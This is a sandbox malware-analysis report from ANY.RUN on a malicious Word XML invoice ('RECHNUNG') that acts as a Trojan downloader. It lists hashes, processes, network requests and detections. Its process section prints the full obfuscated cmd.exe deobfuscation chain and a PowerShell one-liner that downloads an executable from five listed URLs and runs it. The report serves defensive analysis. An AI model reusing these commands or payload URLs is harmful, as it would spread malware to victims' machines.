
RECHNUNG

Full analysis: https://app.any.run/tasks/2d47bcd7-f3bc-4ca3-ac13-7b5e20828237
Verdict: Malicious activity
Analysis date: January 22, 2019, 11:44:32
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5: 8382F58B07748E1674762BC4377DC202
SHA1: DF2B04B8A8F3D98D468387326D7A6A4ABA4AA0D5
SHA256: C324B8597CA11A5FAD5FD5D292F01E9DD5C88FAA7094A366E089B92684268808
SSDEEP: 3072:vh5eJ/zUa+Dl0SiNKDzaJFUKc0UTE7yZRUV7RJeOzi8O:vhQJ/zUa++REDzYUTE7yZRVUi8O

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2356)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2356)
    • Runs app for hidden code execution

      • cmd.exe (PID: 3320)
    • Executes PowerShell scripts

      • cmd.exe (PID: 4004)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • MSOXMLED.EXE (PID: 3428)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3492)
      • cmd.exe (PID: 2900)
      • cmd.exe (PID: 3320)
    • Application launched itself

      • cmd.exe (PID: 2900)
      • cmd.exe (PID: 3492)
    • Creates files in the user directory

      • powershell.exe (PID: 2188)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2356)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2356)
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (31)
.xml | Generic XML (ASCII) (2.3)
.html | HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentBodySectSectPrDocGridLine-pitch: 360
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrRsidR: 005E6EE1
WordDocumentBodySectPRPictShapeImagedataTitle: -
WordDocumentBodySectPRPictShapeImagedataSrc: wordml://02000001.jpg
WordDocumentBodySectPRPictShapeStyle: width:468pt;height:115.5pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeType: #_x0000_t75
WordDocumentBodySectPRPictShapeSpid: _x0000_i1025
WordDocumentBodySectPRPictShapeId: Picture 1
WordDocumentBodySectPRPictBinData: (Binary data 111550 bytes, use -b option to extract)
WordDocumentBodySectPRPictBinDataName: wordml://02000001.jpg
WordDocumentBodySectPRPictShapetypeLockAspectratio: t
WordDocumentBodySectPRPictShapetypeLockExt: edit
WordDocumentBodySectPRPictShapetypePathConnecttype: rect
WordDocumentBodySectPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectPRPictShapetypePathExtrusionok: f
WordDocumentBodySectPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectPRPictShapetypeStroked: f
WordDocumentBodySectPRPictShapetypeFilled: f
WordDocumentBodySectPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypePreferrelative: t
WordDocumentBodySectPRPictShapetypeSpt: 75
WordDocumentBodySectPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectPRPictShapetypeId: _x0000_t75
WordDocumentBodySectPRRPrNoProof: -
WordDocumentBodySectPRRsidRPr: 00843CA7
WordDocumentBodySectPRsidRDefault: 001C0641
WordDocumentBodySectPRsidR: 005E6EE1
WordDocumentDocPrRsidsRsidVal: 001C0641
WordDocumentDocPrRsidsRsidRootVal: 005E6EE1
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrPixelsPerInchVal: 120
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: -
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrViewVal: print
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1026
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentDocSuppDataBinData: (base64-encoded binary data omitted)
WordDocumentDocSuppDataBinDataName: editdata.mso
WordDocumentStylesStyleRPrRFontsCs: Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi: Tahoma
WordDocumentStylesStyleRPrRFontsAscii: Tahoma
WordDocumentStylesStyleRsidVal: 005A24B1
WordDocumentStylesStyleLinkVal: BalloonTextChar
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStylePPrSpacingLine: 259
WordDocumentStylesStylePPrSpacingAfter: 160
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleType: paragraph
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentDocumentPropertiesVersion: 16
WordDocumentDocumentPropertiesCharactersWithSpaces: 1
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesLines: 1
WordDocumentDocumentPropertiesCharacters: 1
WordDocumentDocumentPropertiesWords: -
WordDocumentDocumentPropertiesPages: 1
WordDocumentDocumentPropertiesLastSaved: 2019:01:22 10:46:00Z
WordDocumentDocumentPropertiesCreated: 2019:01:22 10:46:00Z
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesRevision: 1
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentOcxPresent: no
WordDocumentEmbeddedObjPresent: no
WordDocumentMacrosPresent: yes
No data.
Total processes: 41
Monitored processes: 9
Malicious processes: 6
Suspicious processes: 0

Behavior graph

start msoxmled.exe no specs winword.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe

Process information

PID: 3428
CMD: "C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\Desktop\RECHNUNG.xml"
Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: XML Editor
Exit code: 3221225547
Version: 14.0.4750.1000

PID: 2356
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\RECHNUNG.xml"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: MSOXMLED.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.6024.1000

PID: 2900
CMD: c:\i8072\a1011\i6001\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set bFa=evk2pM-fWX T4R,$Dl6I7JV3@89rB0}xEt{U('zQ~b/5jCcwa\:;om%N+AhGy=OgSL_u.iZ1FnPsd)&&for %9 in (4;52;47;54;74;35;28;65;19;45;50;40;43;14;71;54;27;54;64;32;64;64;19;62;55;55;57;5;32;50;40;6;12;14;71;54;58;54;11;32;5;74;50;40;6;23;14;71;54;17;17;10;15;76;12;18;71;25;61;37;27;23;23;18;26;37;51;15;38;43;20;3;3;61;73;0;47;6;52;41;44;0;46;33;10;55;0;33;68;8;0;41;45;17;69;0;73;33;51;15;69;12;25;12;29;61;37;58;33;33;4;50;42;42;47;47;47;68;33;27;48;73;75;17;48;53;4;67;73;63;68;46;52;53;42;64;58;45;58;73;32;28;41;73;45;62;24;58;33;33;4;50;42;42;48;63;0;73;33;7;52;31;68;69;52;42;55;12;62;7;22;32;39;45;12;28;67;35;1;72;45;22;24;58;33;33;4;50;42;42;73;69;63;0;27;69;48;7;48;75;41;53;41;46;52;73;63;27;0;75;75;68;7;67;33;53;69;73;73;48;68;0;76;67;68;73;63;42;23;13;5;3;43;45;20;53;25;58;9;32;20;25;62;66;65;24;58;33;33;4;50;42;42;75;52;75;6;76;0;41;52;67;46;58;48;63;0;6;76;67;53;0;73;60;68;46;52;53;42;47;4;6;48;76;53;69;73;42;22;46;59;21;60;76;13;25;19;72;64;26;24;58;33;33;4;50;42;42;75;48;17;48;58;68;53;52;41;69;69;17;48;33;68;46;52;53;42;32;63;0;29;16;44;7;39;13;62;63;8;17;1;21;70;17;66;73;75;55;1;1;37;68;64;4;17;69;33;36;37;24;37;77;51;15;38;26;12;20;25;61;37;33;23;43;18;20;37;51;15;48;3;3;26;26;10;61;10;37;3;43;71;37;51;15;73;26;3;26;3;61;37;47;71;29;26;26;37;51;15;75;25;25;29;3;61;15;0;73;1;50;33;0;53;4;56;37;49;37;56;15;48;3;3;26;26;56;37;68;0;31;0;37;51;7;52;27;0;48;46;58;36;15;27;12;18;12;18;10;69;73;10;15;69;12;25;12;29;77;34;33;27;60;34;15;38;43;20;3;3;68;16;52;47;73;17;52;48;76;72;69;17;0;36;15;27;12;18;12;18;14;10;15;75;25;25;29;3;77;51;15;69;23;26;26;3;61;37;69;20;29;29;37;51;19;7;10;36;36;59;0;33;6;19;33;0;53;10;15;75;25;25;29;3;77;68;17;0;73;63;33;58;10;6;63;0;10;12;29;29;29;29;77;10;34;19;73;1;52;2;0;6;19;33;0;53;10;15;75;25;25;29;3;51;15;27;26;3;18;25;61;37;1;26;25;12;25;37;51;41;27;0;48;2;51;30;30;46;48;33;46;58;34;30;30;15;69;25;43;29;71;61;37;38;26;20;12;20;37;51;79)do set jtJD=!jtJD!!bFa:~%9,1!&&if %9==79 echo !jtJD:~-629!|FOR /F "tokens=2 delims==Rf" %R IN ('assoc.cmd')DO %R "
Path: c:\windows\system32\cmd.exe
Parent process: WINWORD.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 3492
CMD: CmD /V:/C"set bFa=evk2pM-fWX T4R,$Dl6I7JV3@89rB0}xEt{U('zQ~b/5jCcwa\:;om%N+AhGy=OgSL_u.iZ1FnPsd)&&for %9 in (4;52;47;54;74;35;28;65;19;45;50;40;43;14;71;54;27;54;64;32;64;64;19;62;55;55;57;5;32;50;40;6;12;14;71;54;58;54;11;32;5;74;50;40;6;23;14;71;54;17;17;10;15;76;12;18;71;25;61;37;27;23;23;18;26;37;51;15;38;43;20;3;3;61;73;0;47;6;52;41;44;0;46;33;10;55;0;33;68;8;0;41;45;17;69;0;73;33;51;15;69;12;25;12;29;61;37;58;33;33;4;50;42;42;47;47;47;68;33;27;48;73;75;17;48;53;4;67;73;63;68;46;52;53;42;64;58;45;58;73;32;28;41;73;45;62;24;58;33;33;4;50;42;42;48;63;0;73;33;7;52;31;68;69;52;42;55;12;62;7;22;32;39;45;12;28;67;35;1;72;45;22;24;58;33;33;4;50;42;42;73;69;63;0;27;69;48;7;48;75;41;53;41;46;52;73;63;27;0;75;75;68;7;67;33;53;69;73;73;48;68;0;76;67;68;73;63;42;23;13;5;3;43;45;20;53;25;58;9;32;20;25;62;66;65;24;58;33;33;4;50;42;42;75;52;75;6;76;0;41;52;67;46;58;48;63;0;6;76;67;53;0;73;60;68;46;52;53;42;47;4;6;48;76;53;69;73;42;22;46;59;21;60;76;13;25;19;72;64;26;24;58;33;33;4;50;42;42;75;48;17;48;58;68;53;52;41;69;69;17;48;33;68;46;52;53;42;32;63;0;29;16;44;7;39;13;62;63;8;17;1;21;70;17;66;73;75;55;1;1;37;68;64;4;17;69;33;36;37;24;37;77;51;15;38;26;12;20;25;61;37;33;23;43;18;20;37;51;15;48;3;3;26;26;10;61;10;37;3;43;71;37;51;15;73;26;3;26;3;61;37;47;71;29;26;26;37;51;15;75;25;25;29;3;61;15;0;73;1;50;33;0;53;4;56;37;49;37;56;15;48;3;3;26;26;56;37;68;0;31;0;37;51;7;52;27;0;48;46;58;36;15;27;12;18;12;18;10;69;73;10;15;69;12;25;12;29;77;34;33;27;60;34;15;38;43;20;3;3;68;16;52;47;73;17;52;48;76;72;69;17;0;36;15;27;12;18;12;18;14;10;15;75;25;25;29;3;77;51;15;69;23;26;26;3;61;37;69;20;29;29;37;51;19;7;10;36;36;59;0;33;6;19;33;0;53;10;15;75;25;25;29;3;77;68;17;0;73;63;33;58;10;6;63;0;10;12;29;29;29;29;77;10;34;19;73;1;52;2;0;6;19;33;0;53;10;15;75;25;25;29;3;51;15;27;26;3;18;25;61;37;1;26;25;12;25;37;51;41;27;0;48;2;51;30;30;46;48;33;46;58;34;30;30;15;69;25;43;29;71;61;37;38;26;20;12;20;37;51;79)do set jtJD=!jtJD!!bFa:~%9,1!&&if %9==79 echo !jtJD:~-629!|FOR /F "tokens=2 delims==Rf" %R IN ('assoc.cmd')DO %R "
Path: C:\Windows\system32\cmd.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 3336
CMD: C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $d4618='r3369';$z5722=new-object Net.WebClient;$i4840='http://www.translampung.com/ShChnEBbnCO@http://agentfox.io/N4OfVEQC4BuUvFCV@http://nigeriafasbmbcongress.futminna.edu.ng/3RM25C7m8hXE78O_L@http://sos-debouchage-dumeny.com/wp-admin/VcGJydR8IFS9@http://salah.mobiilat.com/Ege0DjfQROgWlvJZl_nsNvv'.Split('@');$z9478='t3567';$a2299 = '251';$n9292='w1099';$s8802=$env:temp+'\'+$a2299+'.exe';foreach($r4646 in $i4840){try{$z5722.DownloadFile($r4646, $s8802);$i3992='i700';If ((Get-Item $s8802).length -ge 40000) {Invoke-Item $s8802;$r9268='v9848';break;}}catch{}}$i8501='z9747';"
Path: C:\Windows\system32\cmd.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 3320
CMD: C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=2 delims==Rf" %R IN ('assoc.cmd') DO %R "
Path: C:\Windows\system32\cmd.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 3700
CMD: C:\Windows\system32\cmd.exe /c assoc.cmd
Path: C:\Windows\system32\cmd.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 4004
CMD: cmd
Path: C:\Windows\system32\cmd.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 2188
CMD: powershell $d4618='r3369';$z5722=new-object Net.WebClient;$i4840='http://www.translampung.com/ShChnEBbnCO@http://agentfox.io/N4OfVEQC4BuUvFCV@http://nigeriafasbmbcongress.futminna.edu.ng/3RM25C7m8hXE78O_L@http://sos-debouchage-dumeny.com/wp-admin/VcGJydR8IFS9@http://salah.mobiilat.com/Ege0DjfQROgWlvJZl_nsNvv'.Split('@');$z9478='t3567';$a2299 = '251';$n9292='w1099';$s8802=$env:temp+'\'+$a2299+'.exe';foreach($r4646 in $i4840){try{$z5722.DownloadFile($r4646, $s8802);$i3992='i700';If ((Get-Item $s8802).length -ge 40000) {Invoke-Item $s8802;$r9268='v9848';break;}}catch{}}$i8501='z9747';
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

Total events: 1 360
Read events: 890
Write events: 0
Delete events: 0

Modification events

No data
Executable files: 0
Suspicious files: 2
Text files: 2
Unknown types: 5

Dropped files

PID: 2356
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\CVR8E5B.tmp.cvr
MD5:
SHA256:

PID: 2356
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\34B818B1.jpg
MD5:
SHA256:

PID: 2188
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6PS4QGLX57OQ5MCK3RCR.temp
MD5:
SHA256:

PID: 2188
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19aa01.TMP
Type: binary
MD5: 901ECDF767744E6BB59CB023757886E3
SHA256: 48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1

PID: 2356
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd
Type: tlb
MD5: DE78D1BCB7F228A17DC63810251DA6BA
SHA256: 78D5F61576F4B5B2986892BBD66B53CCF08BB324FA44AAF2594FFC9B7A1962CB

PID: 2356
Process: WINWORD.EXE
Filename: C:\Users\admin\Desktop\~$CHNUNG.xml
Type: pgc
MD5: AE4A53C2584981FB610D90781D343243
SHA256: 93FEDA264584BAD490FEB718CA16EF48820613FE41AC072E9FFC430454ABB7D4

PID: 2356
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
Type: text
MD5: A707709DD46F63C8EC879F783184C758
SHA256: 4DD8356D383D2CC2FDF4B2362A3172A3C0C47007D0993D14046EA81E9F0A3FD7

PID: 2188
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Type: binary
MD5: 901ECDF767744E6BB59CB023757886E3
SHA256: 48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1

PID: 2356
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Type: pgc
MD5: 1F9AF8DBADD4163987436CA9DF3CDC37
SHA256: 9FC82323927C8D4BCCFCC5AF0D239A47108D4C8B8875BD51B9B0D713A706D7C7

PID: 2356
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\RECHNUNG.xml.LNK
Type: lnk
MD5: 55C0CAE5E17D3B16B5F8C70071B36898
SHA256: 460CE06AACF11E4B9E65DA6623062A3ECBDD64950BB579298D927229E61DA6F9

HTTP(S) requests: 5
TCP/UDP connections: 5
DNS requests: 5
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
2188 | powershell.exe | GET | 404 | 197.211.34.55:80 | http://nigeriafasbmbcongress.futminna.edu.ng/3RM25C7m8hXE78O_L | NG | xml | 345 b | malicious
2188 | powershell.exe | GET | 404 | 103.247.10.155:80 | http://www.translampung.com/ShChnEBbnCO | ID | xml | 345 b | malicious
2188 | powershell.exe | GET | 404 | 209.123.8.161:80 | http://agentfox.io/N4OfVEQC4BuUvFCV | US | xml | 345 b | malicious
2188 | powershell.exe | GET | 404 | 172.110.29.23:80 | http://sos-debouchage-dumeny.com/wp-admin/VcGJydR8IFS9 | US | xml | 345 b | unknown
2188 | powershell.exe | GET | 404 | 68.66.224.25:80 | http://salah.mobiilat.com/Ege0DjfQROgWlvJZl_nsNvv | US | xml | 345 b | suspicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
2188 | powershell.exe | 209.123.8.161:80 | agentfox.io | Net Access Corporation | US | malicious
2188 | powershell.exe | 197.211.34.55:80 | nigeriafasbmbcongress.futminna.edu.ng | globacom-as | NG | malicious
2188 | powershell.exe | 103.247.10.155:80 | www.translampung.com | Rumahweb Indonesia CV. | ID | suspicious
2188 | powershell.exe | 172.110.29.23:80 | sos-debouchage-dumeny.com | Subnet Labs LLC | US | unknown
2188 | powershell.exe | 68.66.224.25:80 | salah.mobiilat.com | A2 Hosting, Inc. | US | suspicious

DNS requests

Domain | IP | Reputation
www.translampung.com | 103.247.10.155 | malicious
agentfox.io | 209.123.8.161 | malicious
nigeriafasbmbcongress.futminna.edu.ng | 197.211.34.55 | malicious
sos-debouchage-dumeny.com | 172.110.29.23 | unknown
salah.mobiilat.com | 68.66.224.25 | suspicious

Threats

PID | Process | Class | Message
2188 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header
2188 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
2188 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header
2188 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
No debug info